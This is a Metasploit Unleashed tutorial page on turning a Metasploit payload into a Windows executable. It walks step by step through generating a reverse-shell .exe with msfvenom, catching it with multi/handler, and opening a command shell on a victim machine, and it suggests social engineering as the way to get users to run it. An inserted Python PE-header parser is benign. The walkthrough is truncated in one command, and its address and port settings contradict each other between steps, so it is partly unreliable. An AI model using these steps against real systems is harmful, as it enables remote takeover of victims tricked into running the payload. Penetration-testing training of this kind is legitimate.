Binary Payloads - Metasploit Unleashed
Binary Payloads
It seems like Metasploit is full of interesting and useful features. One of these is the ability to generate an
executable from a Metasploit payload. This can be very useful in situations such as social engineering: if you
can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any
software.
Let's look at a quick example of how to do this. We will generate a reverse shell payload, execute it on a
remote system, and get our shell. To do this we will use the command line tool msfvenom. This command can
be used for generating payloads to be used in many locations and offers a variety of output options, from Perl
to C to raw. We are interested in the executable output, which is provided by the -f exe option.
We'll generate a Windows reverse shell executable that will connect back to us on port 31337.
root@kali:~# msfvenom --payload-options -p windows/shell/reverse_tcp
Options for payload/windows/shell/reverse_tcp:

       Name: Windows Command Shell, Reverse TCP Stager
     Module: payload/windows/shell/reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 281
       Rank: Normal

Provided by:
  spoonm
  sf
  hdm
  skape

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Spawn a piped command shell (staged). Connect back to the attacker
root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes
Saved as: /tmp/1.exe

root@kali:~# file /tmp/1.exe
/tmp/1.exe: PE32 executable (GUI) Intel 80386, for MS Windows

https://www.offensive-security.com/metasploit-unleashed/binary-payloads/
09/01/2017
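The file check above identifies the generated binary from its PE headers, which is also the first triage step a defender takes on an unknown executable found on a host. As an added example (not code from the original page or from the Metasploit project), here is a small Python parser that performs that identification itself: it follows the DOS header's e_lfanew pointer to the PE signature, reads the COFF machine type and characteristics plus the optional header's magic and subsystem, and produces a file(1)-style line. The build_header helper is hypothetical and constructs a bare sample header inline so the script runs offline.

```python
import struct

# Constants from the PE/COFF file format specification.
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_DLL = 0x2000
PE32_MAGIC, PE32PLUS_MAGIC = 0x010B, 0x020B
SUBSYSTEMS = {2: "GUI", 3: "console"}


def describe_pe(data: bytes) -> str:
    """Return a file(1)-style description of a PE image, or raise ValueError."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ/DOS executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)      # offset of the PE header
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    # COFF header (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics.
    machine, _, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 70 or opt + opt_size > len(data):
        raise ValueError("optional header missing or truncated")
    (magic,) = struct.unpack_from("<H", data, opt)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)  # same offset in PE32 and PE32+
    fmt = {PE32_MAGIC: "PE32", PE32PLUS_MAGIC: "PE32+"}.get(magic)
    if fmt is None:
        raise ValueError(f"unknown optional header magic 0x{magic:04x}")
    kind = "DLL" if chars & IMAGE_FILE_DLL else "executable"
    sub = SUBSYSTEMS.get(subsystem, f"subsystem {subsystem}")
    arch = "Intel 80386" if machine == IMAGE_FILE_MACHINE_I386 else f"machine 0x{machine:04x}"
    return f"{fmt} {kind} ({sub}) {arch}, for MS Windows"


def build_header(machine=IMAGE_FILE_MACHINE_I386, magic=PE32_MAGIC,
                 subsystem=2, characteristics=0x0102) -> bytes:
    """Constructed sample: a bare PE header (no sections, no code) to exercise the parser."""
    buf = bytearray(0x58 + 224)          # DOS header + PE signature + COFF + PE32 optional header
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)                 # e_lfanew -> PE signature at 0x40
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", buf, 0x44, machine, 0, 0, 0, 0, 224, characteristics)
    struct.pack_into("<H", buf, 0x58, magic)                 # optional header magic
    struct.pack_into("<H", buf, 0x58 + 68, subsystem)        # optional header Subsystem field
    return bytes(buf)


if __name__ == "__main__":
    print(describe_pe(build_header()))   # PE32 executable (GUI) Intel 80386, for MS Windows
```

On a real sample, pass the file's bytes to describe_pe; the result for the binary generated above should match the file output shown.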
Ok, now we see we have a Windows executable ready to go. Next, we will use multi/handler, which is a stub
that handles exploits launched outside of the framework.
root@kali:~# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
When using the exploit/multi/handler module, we still need to tell it which payload to expect, so we configure
it to have the same settings as the executable we generated.
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 172.16.104.130
LHOST => 172.16.104.130
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) >
Now that we have everything set up and ready to go, we run exploit in the multi/handler and execute our
generated executable on the victim. The multi/handler handles the incoming connection for us and presents us our shell.
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (172.16.104.130:31337 -> 172.16.104.128:1150)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Victim\My Documents>